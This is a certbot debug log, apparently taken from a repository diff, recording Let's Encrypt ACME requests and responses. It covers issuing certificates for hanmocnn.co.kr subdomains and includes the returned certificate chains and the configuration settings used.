2026-02-14 22:59:13,486:DEBUG:acme.client:Storing nonce: NeKnt8TGkiAFymgyXx91sjo-OBrE-oQfkAIA5BkETAcVbXDQlto
2026-02-14 22:59:14,487:DEBUG:acme.client:JWS payload:
b''
2026-02-14 22:59:14,492:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480360701606:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhUR2tpQUZ5bWd5WHg5MXNqby1PQnJFLW9RZmtBSUE1QmtFVEFjVmJYRFFsdG8iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL29yZGVyLzMwNjQzODY5MDYvNDgwMzYwNzAxNjA2In0",
"signature": "Z-7PwibQOXUSAB_CO21hOY9cgXtdwG1rm6XbsU4bvAqs1jZQZie589vOdI2zqaHJdzvFygp4EGdSgVP-BTTHKah86AXQi2cEpkFDkXE-PwfqdVWepDBJSbmRV153pH5jNVImDtZfa_khZder6EIjXsliW_jOFfMko6gGMvTz6lfWZMHvJ6tvDvg0f8QoQgsGwkBGQOFtp54nCoV9axiaDyaKqBHJul_7guWVSQRc8kvH18e3mBon4gIoENyM79F4tyL25XkSVPkfFyFgOtvVzMK5fnsm-3InU9K4t6-LLzRf-bUakcdTeK4aN1VAJGVmUo0ov0EYRe0RYHitfjQa9w",
"payload": ""
}
2026-02-14 22:59:14,654:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/order/3064386906/480360701606 HTTP/1.1" 200 456
2026-02-14 22:59:14,655:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 22:59:14 GMT
Content-Type: application/json
Content-Length: 456
Connection: keep-alive
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480360701606
Replay-Nonce: 4AH-2vvBlPhWxA_xH3pX1GKMJ1JDGhdBwPdEwi365OWaCQ0tLxc
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"status": "valid",
"expires": "2026-02-21T22:59:03Z",
"identifiers": [
{
"type": "dns",
"value": "asset.hanmocnn.co.kr"
}
],
"authorizations": [
"https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658770786636"
],
"finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480360701606",
"certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/0519dd73e0ce9a87490ebb7e75a789df5df5"
}
2026-02-14 22:59:14,655:DEBUG:acme.client:Storing nonce: 4AH-2vvBlPhWxA_xH3pX1GKMJ1JDGhdBwPdEwi365OWaCQ0tLxc
2026-02-14 22:59:14,655:DEBUG:acme.client:JWS payload:
b''
2026-02-14 22:59:14,659:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/0519dd73e0ce9a87490ebb7e75a789df5df5:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2QmxQaFd4QV94SDNwWDFHS01KMUpER2hkQndQZEV3aTM2NU9XYUNRMHRMeGMiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDUxOWRkNzNlMGNlOWE4NzQ5MGViYjdlNzVhNzg5ZGY1ZGY1In0",
"signature": "aNwI7RwCcv76J8ktGfy0gChQ1ua2ZM9ov4ueZs4nFi9cOfah2fT650Dp4kh6gOcUMHfts5-LMvj4EwFqD5QAjpI2A9ge_KIC0Tifji0eRRuBF9YzcI7k3UodzNmOCMsO3w-ylFA3SWDDwOoUaLnyLY3FXVxhCjMlvKJohHZVMkTHivtzZxkfC_Z46zlzh5PVqP5qO2bkANnKsnrlYtXx6MVn0_Wv3NwU2cQC8b_lmdD5lDpTKjQHHx-HzCAFoPECSW2DFKBLUKKA4OSOjvepqAct2LI0YY-6vBZxtvAZlroXLPtENtMIP0pYlv_b0pGwrzVsyQSEGZRtgFxEahwlTA",
"payload": ""
}
2026-02-14 22:59:14,820:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/0519dd73e0ce9a87490ebb7e75a789df5df5 HTTP/1.1" 200 2909
2026-02-14 22:59:14,821:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 22:59:14 GMT
Content-Type: application/pem-certificate-chain
Content-Length: 2909
Connection: keep-alive
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index", <https://acme-v02.api.letsencrypt.org/acme/cert/0519dd73e0ce9a87490ebb7e75a789df5df5/1>;rel="alternate"
Replay-Nonce: 4AH-2vvBHXlFw_TACqGZ1oTRV-SKrkz7zJl6XVjonKPAOUQ_71o
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
-----BEGIN CERTIFICATE-----
MIIDsTCCAzegAwIBAgISBRndc+DOmodJDrt+daeJ3131MAoGCCqGSM49BAMDMDIx
CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF
NzAeFw0yNjAyMTQyMjAwNDFaFw0yNjA1MTUyMjAwNDBaMB8xHTAbBgNVBAMTFGFz
c2V0Lmhhbm1vY25uLmNvLmtyMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEXZuWww50
LGZLNqLZI+HF8yTMleRX+LpmoGLUNFGxgYSAzVgLqkwzdYtCZWgZUeX3Rz774/89
oqy/XC6KS12HR3ZBwYHGuhWWbJP4bZbv67AJZd5UHdkccNa9wyBEO/Cio4ICITCC
Ah0wDgYDVR0PAQH/BAQDAgeAMBMGA1UdJQQMMAoGCCsGAQUFBwMBMAwGA1UdEwEB
/wQCMAAwHQYDVR0OBBYEFBaS++xJtf3XGPCAgqNyrG/f6BjWMB8GA1UdIwQYMBaA
FK5IntyHHUSgb9qi5WB0BHjCnACAMDIGCCsGAQUFBwEBBCYwJDAiBggrBgEFBQcw
AoYWaHR0cDovL2U3LmkubGVuY3Iub3JnLzAfBgNVHREEGDAWghRhc3NldC5oYW5t
b2Nubi5jby5rcjATBgNVHSAEDDAKMAgGBmeBDAECATAuBgNVHR8EJzAlMCOgIaAf
hh1odHRwOi8vZTcuYy5sZW5jci5vcmcvMTE4LmNybDCCAQwGCisGAQQB1nkCBAIE
gf0EgfoA+AB+AHF+lfPCOIptseOEST0x4VqpYgh2LUIA4AUM0Ge1pmHiAAABnF5h
J7AACAAABQAJd1XWBAMARzBFAiAK+ar1Oe7x8331v3kEuwoGwp+dv74lXiLRR3ha
qIaI7AIhAKKyvL5ZXcSPZkDUIojUb1qiT62e6c72VV4nZ1bKj2pwAHYAyzj3FYl8
hKFEX1vB3fvJbvKaWc1HCmkFhbDLFMMUWOcAAAGcXmEvPQAABAMARzBFAiEAwlck
zhIDZTof4Ly6HlsgLfrQR3w0vZKFcAHUgPHSklMCID3qzQmRZ/23apueRRaFWhn6
nFl5c+CM5LkcqPXM3EHXMAoGCCqGSM49BAMDA2gAMGUCMQDeE9lAjzxWJ4rVeKd4
6k5AMZFdzthNUAE+cK42bfa/dmjtOsJxmbItPpYHVobCNWUCMHcA28jODrzpXiRs
1bzWj5Q4ljROTpshInXRWFBTILNwxZ0O+gcnK6B4h4x7309wZw==
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----
MIIEVzCCAj+gAwIBAgIRAKp18eYrjwoiCWbTi7/UuqEwDQYJKoZIhvcNAQELBQAw
TzELMAkGA1UEBhMCVVMxKTAnBgNVBAoTIEludGVybmV0IFNlY3VyaXR5IFJlc2Vh
cmNoIEdyb3VwMRUwEwYDVQQDEwxJU1JHIFJvb3QgWDEwHhcNMjQwMzEzMDAwMDAw
WhcNMjcwMzEyMjM1OTU5WjAyMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3Mg
RW5jcnlwdDELMAkGA1UEAxMCRTcwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAARB6AST
CFh/vjcwDMCgQer+VtqEkz7JANurZxLP+U9TCeioL6sp5Z8VRvRbYk4P1INBmbef
QHJFHCxcSjKmwtvGBWpl/9ra8HW0QDsUaJW2qOJqceJ0ZVFT3hbUHifBM/2jgfgw
gfUwDgYDVR0PAQH/BAQDAgGGMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcD
ATASBgNVHRMBAf8ECDAGAQH/AgEAMB0GA1UdDgQWBBSuSJ7chx1EoG/aouVgdAR4
wpwAgDAfBgNVHSMEGDAWgBR5tFnme7bl5AFzgAiIyBpY9umbbjAyBggrBgEFBQcB
AQQmMCQwIgYIKwYBBQUHMAKGFmh0dHA6Ly94MS5pLmxlbmNyLm9yZy8wEwYDVR0g
BAwwCjAIBgZngQwBAgEwJwYDVR0fBCAwHjAcoBqgGIYWaHR0cDovL3gxLmMubGVu
Y3Iub3JnLzANBgkqhkiG9w0BAQsFAAOCAgEAjx66fDdLk5ywFn3CzA1w1qfylHUD
aEf0QZpXcJseddJGSfbUUOvbNR9N/QQ16K1lXl4VFyhmGXDT5Kdfcr0RvIIVrNxF
h4lqHtRRCP6RBRstqbZ2zURgqakn/Xip0iaQL0IdfHBZr396FgknniRYFckKORPG
yM3QKnd66gtMst8I5nkRQlAg/Jb+Gc3egIvuGKWboE1G89NTsN9LTDD3PLj0dUMr
OIuqVjLB8pEC6yk9enrlrqjXQgkLEYhXzq7dLafv5Vkig6Gl0nuuqjqfp0Q1bi1o
yVNAlXe6aUXw92CcghC9bNsKEO1+M52YY5+ofIXlS/SEQbvVYYBLZ5yeiglV6t3S
M6H+vTG0aP9YHzLn/KVOHzGQfXDP7qM5tkf+7diZe7o2fw6O7IvN6fsQXEQQj8TJ
UXJxv2/uJhcuy/tSDgXwHM8Uk34WNbRT7zGTGkQRX0gsbjAea/jYAoWv0ZvQRwpq
Pe79D/i7Cep8qWnA+7AE/3B3S/3dEEYmc0lpe1366A/6GEgk3ktr9PEoQrLChs6I
tu3wnNLB2euC8IKGLQFpGtOO/2/hiAKjyajaBP25w1jF0Wl8Bbqne3uZ2q1GyPFJ
YRmT7/OXpmOH/FVLtwS+8ng1cAmpCujPwteJZNcDG0sF2n/sc0+SQf49fdyUK0ty
+VUwFj9tmWxyR/M=
-----END CERTIFICATE-----
2026-02-14 22:59:14,821:DEBUG:acme.client:Storing nonce: 4AH-2vvBHXlFw_TACqGZ1oTRV-SKrkz7zJl6XVjonKPAOUQ_71o
2026-02-14 22:59:14,821:DEBUG:acme.client:JWS payload:
b''
2026-02-14 22:59:14,826:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/0519dd73e0ce9a87490ebb7e75a789df5df5/1:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2QkhYbEZ3X1RBQ3FHWjFvVFJWLVNLcmt6N3pKbDZYVmpvbktQQU9VUV83MW8iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDUxOWRkNzNlMGNlOWE4NzQ5MGViYjdlNzVhNzg5ZGY1ZGY1LzEifQ",
"signature": "sEsakd4hO8DFc3jDyP7m6Qx5z0Lbusnx8gMc9jh3fDtXm3fpnrj7zk2Gazi9IwMJ12iSd2p1MoEsmNDqwnpqr0INEJHYN6PLJEWwl_YWtaHzb8RbtXrVBEq7h-Ktz0mMJYsC64Pe8Nxm-TvVx6Uj_DwxNxswypZQP95rTjWhIkcK_xL_Bq2dWn1kTBr-rM76gvsbvlYdO2nsnaPqdheow62RxFXscm5F50ixvWiNxFACAC2u7bs9kRZGIumNcHf5_pREpgSuBlodFzpZ8n4cGJgouEafB4ZY6Fr2aTkXyb4_wBBhWvUwmCDHEwg4vE31WR-OHN-325DlYG5SvlUDnA",
"payload": ""
}
2026-02-14 22:59:14,988:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/0519dd73e0ce9a87490ebb7e75a789df5df5/1 HTTP/1.1" 200 2344
2026-02-14 22:59:14,988:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 22:59:14 GMT
Content-Type: application/pem-certificate-chain
Content-Length: 2344
Connection: keep-alive
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index", <https://acme-v02.api.letsencrypt.org/acme/cert/0519dd73e0ce9a87490ebb7e75a789df5df5/0>;rel="alternate"
Replay-Nonce: NeKnt8TG8v_xm54X0ORybpWrtBSiE4_ErhUKHWOcAjOGwrp0dqk
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
-----BEGIN CERTIFICATE-----
MIIDsTCCAzegAwIBAgISBRndc+DOmodJDrt+daeJ3131MAoGCCqGSM49BAMDMDIx
CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF
NzAeFw0yNjAyMTQyMjAwNDFaFw0yNjA1MTUyMjAwNDBaMB8xHTAbBgNVBAMTFGFz
c2V0Lmhhbm1vY25uLmNvLmtyMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAEXZuWww50
LGZLNqLZI+HF8yTMleRX+LpmoGLUNFGxgYSAzVgLqkwzdYtCZWgZUeX3Rz774/89
oqy/XC6KS12HR3ZBwYHGuhWWbJP4bZbv67AJZd5UHdkccNa9wyBEO/Cio4ICITCC
Ah0wDgYDVR0PAQH/BAQDAgeAMBMGA1UdJQQMMAoGCCsGAQUFBwMBMAwGA1UdEwEB
/wQCMAAwHQYDVR0OBBYEFBaS++xJtf3XGPCAgqNyrG/f6BjWMB8GA1UdIwQYMBaA
FK5IntyHHUSgb9qi5WB0BHjCnACAMDIGCCsGAQUFBwEBBCYwJDAiBggrBgEFBQcw
AoYWaHR0cDovL2U3LmkubGVuY3Iub3JnLzAfBgNVHREEGDAWghRhc3NldC5oYW5t
b2Nubi5jby5rcjATBgNVHSAEDDAKMAgGBmeBDAECATAuBgNVHR8EJzAlMCOgIaAf
hh1odHRwOi8vZTcuYy5sZW5jci5vcmcvMTE4LmNybDCCAQwGCisGAQQB1nkCBAIE
gf0EgfoA+AB+AHF+lfPCOIptseOEST0x4VqpYgh2LUIA4AUM0Ge1pmHiAAABnF5h
J7AACAAABQAJd1XWBAMARzBFAiAK+ar1Oe7x8331v3kEuwoGwp+dv74lXiLRR3ha
qIaI7AIhAKKyvL5ZXcSPZkDUIojUb1qiT62e6c72VV4nZ1bKj2pwAHYAyzj3FYl8
hKFEX1vB3fvJbvKaWc1HCmkFhbDLFMMUWOcAAAGcXmEvPQAABAMARzBFAiEAwlck
zhIDZTof4Ly6HlsgLfrQR3w0vZKFcAHUgPHSklMCID3qzQmRZ/23apueRRaFWhn6
nFl5c+CM5LkcqPXM3EHXMAoGCCqGSM49BAMDA2gAMGUCMQDeE9lAjzxWJ4rVeKd4
6k5AMZFdzthNUAE+cK42bfa/dmjtOsJxmbItPpYHVobCNWUCMHcA28jODrzpXiRs
1bzWj5Q4ljROTpshInXRWFBTILNwxZ0O+gcnK6B4h4x7309wZw==
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----
MIICtzCCAjygAwIBAgIRAMWKhaLGI0XgqMRSU4efWTowCgYIKoZIzj0EAwMwTzEL
MAkGA1UEBhMCVVMxKTAnBgNVBAoTIEludGVybmV0IFNlY3VyaXR5IFJlc2VhcmNo
IEdyb3VwMRUwEwYDVQQDEwxJU1JHIFJvb3QgWDIwHhcNMjQwMzEzMDAwMDAwWhcN
MjcwMzEyMjM1OTU5WjAyMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3MgRW5j
cnlwdDELMAkGA1UEAxMCRTcwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAARB6ASTCFh/
vjcwDMCgQer+VtqEkz7JANurZxLP+U9TCeioL6sp5Z8VRvRbYk4P1INBmbefQHJF
HCxcSjKmwtvGBWpl/9ra8HW0QDsUaJW2qOJqceJ0ZVFT3hbUHifBM/2jgfgwgfUw
DgYDVR0PAQH/BAQDAgGGMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcDATAS
BgNVHRMBAf8ECDAGAQH/AgEAMB0GA1UdDgQWBBSuSJ7chx1EoG/aouVgdAR4wpwA
gDAfBgNVHSMEGDAWgBR8Qpau3ktIO/qS+J6Mz22LqXI3lTAyBggrBgEFBQcBAQQm
MCQwIgYIKwYBBQUHMAKGFmh0dHA6Ly94Mi5pLmxlbmNyLm9yZy8wEwYDVR0gBAww
CjAIBgZngQwBAgEwJwYDVR0fBCAwHjAcoBqgGIYWaHR0cDovL3gyLmMubGVuY3Iu
b3JnLzAKBggqhkjOPQQDAwNpADBmAjEA/e5N+wjAk945cpaFxGaeMC13fyvdbNzX
lRg9HNdElxi5mXdI4az2CykNU07iFwqEAjEAihPCDkw4b1BvfLg8VNLLuaMpn1Rb
Z1682chR6zNRCseyie4SjyTCdkvsAa+omQSf
-----END CERTIFICATE-----
2026-02-14 22:59:14,989:DEBUG:acme.client:Storing nonce: NeKnt8TG8v_xm54X0ORybpWrtBSiE4_ErhUKHWOcAjOGwrp0dqk
2026-02-14 22:59:14,990:INFO:certbot._internal.client:Non-standard path(s), might not work with crontab installed by your operating system package manager
2026-02-14 22:59:14,990:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/archive/npm-2.
2026-02-14 22:59:14,991:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/live/npm-2.
2026-02-14 22:59:14,991:DEBUG:certbot._internal.storage:Writing certificate to /etc/letsencrypt/live/npm-2/cert.pem.
2026-02-14 22:59:14,991:DEBUG:certbot._internal.storage:Writing private key to /etc/letsencrypt/live/npm-2/privkey.pem.
2026-02-14 22:59:14,991:DEBUG:certbot._internal.storage:Writing chain to /etc/letsencrypt/live/npm-2/chain.pem.
2026-02-14 22:59:14,991:DEBUG:certbot._internal.storage:Writing full chain to /etc/letsencrypt/live/npm-2/fullchain.pem.
2026-02-14 22:59:14,992:DEBUG:certbot._internal.storage:Writing README to /etc/letsencrypt/live/npm-2/README.
2026-02-14 22:59:15,003:DEBUG:certbot.configuration:Var account=ce2ddac5740bb12d4d6591b7fa1728af (set by user).
2026-02-14 22:59:15,003:DEBUG:certbot.configuration:Var key_type=ecdsa (set by user).
2026-02-14 22:59:15,003:DEBUG:certbot.configuration:Var elliptic_curve=secp384r1 (set by user).
2026-02-14 22:59:15,003:DEBUG:certbot.configuration:Var preferred_chain=ISRG Root X1 (set by user).
2026-02-14 22:59:15,003:DEBUG:certbot.configuration:Var pref_challs=['http-01'] (set by user).
2026-02-14 22:59:15,003:DEBUG:certbot.configuration:Var config_dir=/etc/letsencrypt (set by user).
2026-02-14 22:59:15,003:DEBUG:certbot.configuration:Var work_dir=/tmp/letsencrypt-lib (set by user).
2026-02-14 22:59:15,003:DEBUG:certbot.configuration:Var logs_dir=/data/logs (set by user).
2026-02-14 22:59:15,004:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None
2026-02-14 22:59:15,004:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None
2026-02-14 22:59:15,004:DEBUG:certbot.configuration:Var webroot_path=['/data/letsencrypt-acme-challenge'] (set by user).
2026-02-14 22:59:15,004:DEBUG:certbot.configuration:Var webroot_map={'asset.hanmocnn.co.kr': '/data/letsencrypt-acme-challenge'} (set by user).
2026-02-14 22:59:15,006:DEBUG:certbot._internal.display.obj:Notifying user:
Successfully received certificate.
Certificate is saved at: /etc/letsencrypt/live/npm-2/fullchain.pem
Key is saved at: /etc/letsencrypt/live/npm-2/privkey.pem
This certificate expires on 2026-05-15.
These files will be updated when the certificate renews.
2026-02-14 22:59:15,006:DEBUG:certbot._internal.display.obj:Notifying user: NEXT STEPS:
2026-02-14 22:59:15,006:DEBUG:certbot._internal.display.obj:Notifying user: - The certificate will need to be renewed before it expires. Certbot can automatically renew the certificate in the background, but you may need to take steps to enable that functionality. See https://certbot.org/renewal-setup for instructions.
2026-02-14 22:59:15,010:DEBUG:certbot._internal.display.obj:Notifying user: If you like Certbot, please consider supporting our work by:
* Donating to ISRG / Let's Encrypt: https://letsencrypt.org/donate
* Donating to EFF: https://eff.org/donate-le

View File

@@ -1,646 +0,0 @@
2026-02-14 22:36:58,989:DEBUG:certbot._internal.main:certbot version: 5.3.0
2026-02-14 22:36:58,990:DEBUG:certbot._internal.main:Location of certbot entry point: /opt/certbot/bin/certbot
2026-02-14 22:36:58,990:DEBUG:certbot._internal.main:Arguments: ['--config', '/etc/letsencrypt.ini', '--work-dir', '/tmp/letsencrypt-lib', '--logs-dir', '/data/logs', '--cert-name', 'npm-1', '--agree-tos', '--authenticator', 'webroot', '-m', 'windpacer@hanmocnn.co.kr', '--preferred-challenges', 'http', '--domains', 'www.hanmocnn.co.kr']
2026-02-14 22:36:58,990:DEBUG:certbot._internal.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot)
2026-02-14 22:36:59,006:DEBUG:certbot._internal.log:Root logging level set at 30
2026-02-14 22:36:59,007:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None
2026-02-14 22:36:59,008:DEBUG:certbot._internal.plugins.selection:Single candidate plugin: * webroot
Description: Saves the necessary validation files to a .well-known/acme-challenge/ directory within the nominated webroot path. A separate HTTP server must be running and serving files from the webroot path. HTTP challenge only (wildcards not supported).
Interfaces: Authenticator, Plugin
Entry point: EntryPoint(name='webroot', value='certbot._internal.plugins.webroot:Authenticator', group='certbot.plugins')
Initialized: <certbot._internal.plugins.webroot.Authenticator object at 0xffffab360e50>
Prep: True
2026-02-14 22:36:59,008:DEBUG:certbot._internal.plugins.selection:Selected authenticator <certbot._internal.plugins.webroot.Authenticator object at 0xffffab360e50> and installer None
2026-02-14 22:36:59,008:INFO:certbot._internal.plugins.selection:Plugins selected: Authenticator webroot, Installer None
2026-02-14 22:36:59,320:DEBUG:acme.client:Sending GET request to https://acme-v02.api.letsencrypt.org/directory.
2026-02-14 22:36:59,323:DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): acme-v02.api.letsencrypt.org:443
2026-02-14 22:36:59,894:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "GET /directory HTTP/1.1" 200 1033
2026-02-14 22:36:59,895:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 22:36:59 GMT
Content-Type: application/json
Content-Length: 1033
Connection: keep-alive
Cache-Control: public, max-age=0, no-cache
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"keyChange": "https://acme-v02.api.letsencrypt.org/acme/key-change",
"meta": {
"caaIdentities": [
"letsencrypt.org"
],
"profiles": {
"classic": "https://letsencrypt.org/docs/profiles#classic",
"shortlived": "https://letsencrypt.org/docs/profiles#shortlived",
"tlsclient": "https://letsencrypt.org/docs/profiles#tlsclient",
"tlsserver": "https://letsencrypt.org/docs/profiles#tlsserver"
},
"termsOfService": "https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf",
"website": "https://letsencrypt.org"
},
"newAccount": "https://acme-v02.api.letsencrypt.org/acme/new-acct",
"newNonce": "https://acme-v02.api.letsencrypt.org/acme/new-nonce",
"newOrder": "https://acme-v02.api.letsencrypt.org/acme/new-order",
"oEbqUiTfyAY": "https://community.letsencrypt.org/t/adding-random-entries-to-the-directory/33417",
"renewalInfo": "https://acme-v02.api.letsencrypt.org/acme/renewal-info",
"revokeCert": "https://acme-v02.api.letsencrypt.org/acme/revoke-cert"
}
2026-02-14 22:36:59,896:DEBUG:acme.client:Requesting fresh nonce
2026-02-14 22:36:59,896:DEBUG:acme.client:Sending HEAD request to https://acme-v02.api.letsencrypt.org/acme/new-nonce.
2026-02-14 22:37:00,072:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "HEAD /acme/new-nonce HTTP/1.1" 200 0
2026-02-14 22:37:00,072:DEBUG:acme.client:Received response:
HTTP 200
Server: nginx
Date: Sat, 14 Feb 2026 22:36:59 GMT
Connection: keep-alive
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
Replay-Nonce: qLPTsdtfSb4xuFyI8A1j8PWRQnBciypxtBTvZfd5NvpveG9E4I0
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
2026-02-14 22:37:00,073:DEBUG:acme.client:Storing nonce: qLPTsdtfSb4xuFyI8A1j8PWRQnBciypxtBTvZfd5NvpveG9E4I0
2026-02-14 22:37:00,073:DEBUG:acme.client:JWS payload:
b'{\n "contact": [\n "mailto:windpacer@hanmocnn.co.kr"\n ],\n "termsOfServiceAgreed": true\n}'
2026-02-14 22:37:00,081:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-acct:
{
"protected": "eyJhbGciOiAiUlMyNTYiLCAiandrIjogeyJuIjogInlsZkw4bmp6RXJhUUs3QmtYLUp2bkt0T3JSLVhsME9KMGpEQThHRmVQUG5jSHRnbkFwZlM5SktoM1U0eV9wbUg0aENqR05vUkZSSXEzRjE3Z0ZTRThPY3F3c0VYTWkzVjFOT2R6RU1TNmwzVTZWNW9jTWhSbFNFMHZ6azZsRHpZSlZGY2VKa0xZWjk1MmNhZ3JBc3RnNm05d0VHZXU3RnJRNm9GT3RwTm1nMW1vRmtWY09EWEFpVmRpbldRRGhyblJMQmJXdlRtd0ozRkYzUy1admJMTDdOUnFPSlVDdVFBU2RuWFFGNmRGcFdKbkRGd1dOeXYxR3k4Q0NhZlNrVl9EOEJiUm1SaGlKSXRLNFNUanRVZUhrNWRlVnJqWEpSS2Zfd2RoZ2VjaGVxVGtzVVpTZERTVXVLeVR0cDZFTUVkMHdpalQ0aXpPYXYyQVU2bGp1dmljUSIsICJlIjogIkFRQUIiLCAia3R5IjogIlJTQSJ9LCAibm9uY2UiOiAicUxQVHNkdGZTYjR4dUZ5SThBMWo4UFdSUW5CY2l5cHh0QlR2WmZkNU52cHZlRzlFNEkwIiwgInVybCI6ICJodHRwczovL2FjbWUtdjAyLmFwaS5sZXRzZW5jcnlwdC5vcmcvYWNtZS9uZXctYWNjdCJ9",
"signature": "pML7yPmuF20tbvdpBRytdKGGQGUbsNmBY_eTnk8gIqeDcPEwBhchkw3nCgk1Btss3QEeKjdElfogjrlYd8bRiOn5DSM4FsyiuJkTtJX0j80l4XMQlPjzAuFYWskkNWmRoHCtgUKyO8hZ4YB7OLo31Eu4c-hzHl97-fcQ_fSt7ACx-jkJy0EVzvL0T4tZwWasPE4NOZ5FUCbLHgVi7NVs-rLA8o7DpVmWbS2GAi28bmfqHgeCwyMwfeZ_hbKv4wFhHe9ePgQ5Y3HFittE8W12UyC0dbs2oPZDvlmIaS1v2mtxfGpO6Z8I9uLHGSey2IE-DhdDw_cOkpnJiXKe2zrz4Q",
"payload": "ewogICJjb250YWN0IjogWwogICAgIm1haWx0bzp3aW5kcGFjZXJAaGFubW9jbm4uY28ua3IiCiAgXSwKICAidGVybXNPZlNlcnZpY2VBZ3JlZWQiOiB0cnVlCn0"
}
2026-02-14 22:37:00,327:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-acct HTTP/1.1" 201 477
2026-02-14 22:37:00,328:DEBUG:acme.client:Received response:
HTTP 201
Server: nginx
Date: Sat, 14 Feb 2026 22:37:00 GMT
Content-Type: application/json
Content-Length: 477
Connection: keep-alive
Boulder-Requester: 3064386906
Cache-Control: public, max-age=0, no-cache
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index", <https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf>;rel="terms-of-service"
Location: https://acme-v02.api.letsencrypt.org/acme/acct/3064386906
Replay-Nonce: qLPTsdtfD_e1BzmduE7JCgdyITbwkLqfkiF03UuBKCWrQjkunG0
X-Frame-Options: DENY
Strict-Transport-Security: max-age=604800
{
"key": {
"kty": "RSA",
"n": "ylfL8njzEraQK7BkX-JvnKtOrR-Xl0OJ0jDA8GFePPncHtgnApfS9JKh3U4y_pmH4hCjGNoRFRIq3F17gFSE8OcqwsEXMi3V1NOdzEMS6l3U6V5ocMhRlSE0vzk6lDzYJVFceJkLYZ952cagrAstg6m9wEGeu7FrQ6oFOtpNmg1moFkVcODXAiVdinWQDhrnRLBbWvTmwJ3FF3S-ZvbLL7NRqOJUCuQASdnXQF6dFpWJnDFwWNyv1Gy8CCafSkV_D8BbRmRhiJItK4STjtUeHk5deVrjXJRKf_wdhgecheqTksUZSdDSUuKyTtp6EMEd0wijT4izOav2AU6ljuvicQ",
"e": "AQAB"
},
"createdAt": "2026-02-14T22:37:00.200855652Z",
"status": "valid"
}
2026-02-14 22:37:00,328:DEBUG:acme.client:Storing nonce: qLPTsdtfD_e1BzmduE7JCgdyITbwkLqfkiF03UuBKCWrQjkunG0
